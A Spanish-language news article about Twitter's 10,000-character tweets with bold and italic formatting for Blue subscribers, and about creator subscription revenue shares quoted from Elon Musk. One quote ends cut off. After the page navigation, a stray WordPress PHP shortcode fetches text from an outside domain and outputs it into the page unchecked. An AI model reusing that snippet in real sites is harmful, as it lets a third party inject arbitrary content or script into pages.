El logotipo y la marca registrada de Twitter se muestran en el piso de la Bolsa de Valores de Nueva York (NYSE) el 11 de julio de 2022 en la ciudad de Nueva York.


Brandon McDermid | Reuters






Twitter ha lanzado una nueva función que permite a sus suscriptores de Blue twittear hasta 10.000 caracteres en mensajes que también admitirán el formato de negrita y cursiva.


Las nuevas características permiten una escritura más larga que se parece más a un artículo que los fragmentos cortos de texto que han definido a Twitter durante años. Twitter tuvo un límite de 140 caracteres durante años, antes de duplicarlo a 280 en 2017.


Twitter Blue es el producto de suscripción de la compañía que ofrece más funciones que la versión gratuita, incluida la marca de verificación azul. Si te registras a través de Twitter, cuesta $ 8 por mes.



“¡Estamos mejorando la experiencia de escritura y lectura en Twitter! A partir de hoy, Twitter ahora admite tweets de hasta 10,000 caracteres con formato de texto en negrita y cursiva”, dijo el jueves una de las cuentas oficiales de Twitter. “Regístrese en Twitter Blue para acceder a estas nuevas funciones y solicite activar la suscripción en su cuenta para obtener ingresos directamente en Twitter”.


Twitter también está ampliando sus opciones de monetización, lo que permite a los usuarios suscribirse a sus creadores de contenido favoritos a cambio de contenido solo para suscriptores. El modelo solo para suscriptores es similar a ofrecer servicios como Substack.


El CEO de Twitter, Elon Musk, dijo que los creadores obtendrán una mayor parte de los ingresos por suscripción.



“Lo que sea que cobremos, lo obtendrás, por lo que es 70% para suscripciones en iOS y Android (cobran 30%) y 92% en la web (podría ser mejor, el pago depende del procesador)”, tuiteó Musk. “Después del primer año, las tarifas de iOS y Android bajan al 15 % y agregaremos una pequeña cantidad adicional dependiendo del volumen. También ayudaremos a promover su trabajo. Nuestro objetivo es crear para maximizar la prosperidad de. “


Musk, quien también es el CEO de Tesla y SpaceX, también lanzó un producto de suscripción para su cuenta, cobrando a los usuarios $ 4 por mes solo para ver sus tweets privados de suscripción.



Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');